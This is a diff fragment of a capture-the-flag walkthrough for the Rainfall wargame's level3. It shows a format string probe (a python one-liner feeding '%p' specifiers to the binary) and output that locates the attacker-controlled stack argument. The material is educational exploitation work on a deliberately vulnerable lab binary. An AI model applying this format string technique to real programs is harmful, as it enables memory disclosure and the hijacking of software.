selfsigned/HackThePlanet/Rainfall/level3/walkthrough.md

 ```
 Odd, we're getting the value of the argument of fgets and what strongly looks like stack addresses, which means....

+We know that the ascii of value value of 0 is `0x30`, let's try inserting a bunch of zeroes at the start of our buffer:
 ```shell
 level3@RainFall:~$ ./level3 <<< `python -c 'print "0000" + "%p "*10'`
 00000x200 0xb7fd1ac0 0xb7ff37d0 0x30303030 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520
 ```
-we can see that the 4th pointer gets modified by our printf format string, nice!
+We can see that the 4th pointer gets modified by our printf format string as it's made of four zeroes (0x30303030), nice!

 Let's simplify our string a bit now that we know which argument we can act on